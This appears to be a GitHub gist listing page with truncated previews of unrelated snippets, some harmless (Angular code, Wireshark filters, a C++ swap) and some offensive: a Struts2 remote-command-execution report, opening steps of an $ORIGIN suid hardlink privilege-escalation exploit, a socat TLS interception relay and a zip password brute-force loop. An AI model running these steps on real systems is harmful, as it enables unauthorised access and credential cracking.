View gist:7078472
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Japan's largest domain name registrar a subsite remote command execution | |
*Abstract:* | |
Japan's largest domain name registrar a subsite remote command execution | |
Details: | |
Apache struts2 a vulnerability introduced by manipulating parameters | |
prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command |
View gist:7078496
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Create a directory in /tmp we can control. | |
$ mkdir /tmp/exploit | |
# Link to an suid binary, thus changing the definition of $ORIGIN. | |
$ ln /bin/ping /tmp/exploit/target | |
# Open a file descriptor to the target binary (note: some users are surprised | |
# to learn exec can be used to manipulate the redirections of the current | |
# shell if a command is not specified. This is what is happening below). | |
$ exec 3< /tmp/exploit/target |
View gist:7079322
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <iostream> | |
void swap(int& a, int& b){ | |
b ^= a; a ^= b; b ^= a; | |
} | |
int main(){ | |
int a = 1, b = 2; | |
swap(a, b); |
View gist:7079339
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1. ip.addr == 10.0.0.1 [Sets a filter for any packet with 10.0.0.1, as either the source or dest] | |
2. ip.addr==10.0.0.1 && ip.addr==10.0.0.2 [sets a conversation filter between the two defined IP addresses] | |
3. http or dns [sets a filter to display all http and dns] | |
4. tcp.port==4000 [sets a filter for any TCP packet with 4000 as a source or dest port] | |
5. tcp.flags.reset==1 [displays all TCP resets] |
View gist:7079345
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
openssl req -new -x509 -newkey rsa:1024 -out server.pem -keyout server.pem | |
socat -d -d openssl-listen:10443,reuseaddr,fork,cert=server.pem,verify=0 openssl:$target:443,verify=0 |
View gist:7079362
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
stop in jp.example.myapp.ExampleActivity.onCreate | |
adb wait-for-device shell am start -D -a android.intent.action.MAIN -n jp.example.myapp/.ExampleActivity | |
adb forward tcp:8888 jdwp:`adb jdwp|tail -1` | |
jdb -attach localhost:8888 |
View gist:7079756
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ time /opt/john-1.7.9-jumbo-7/run/john -i=digits --stdout|while read pw;do echo $pw;unzip -pqq -P $pw passwd.zip 2>&1 1>/dev/null && break;done |
View gist:8276229
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Source: https://groups.google.com/forum/#!topic/angular/hVrkvaHGOfc | |
// jsFiddle: http://jsfiddle.net/pkozlowski_opensource/PxdSP/14/ | |
// author: Pawel Kozlowski | |
var myApp = angular.module('myApp', []); | |
//service style, probably the simplest one | |
myApp.service('helloWorldFromService', function() { | |
this.sayHello = function() { | |
return "Hello, World!" |
View tor exit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
import requests | |
from iso3166 import countries | |
url="http://example.com/path/to/it" | |
cookies = dict(session='dcd83eacd7b3518b0d5064ce957d606218cc15616ec72c18cd866a9972aca6fb') | |
data= requests.get(url,cookies=cookies,verify=False).content | |
lines = data.split('\n') | |
flags = [] | |
for i in lines: | |
if "inactive" in i: |
View angular-socket.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//TODO: make this a module | |
/** | |
* # SockJS socket management service | |
* | |
* Creates SockJS socket connection to server, re-connects on disconnection, | |
* and exports hooks to map handlers for various data interactions. | |
* | |
*/ | |
angular.module('app').factory |
OlderNewer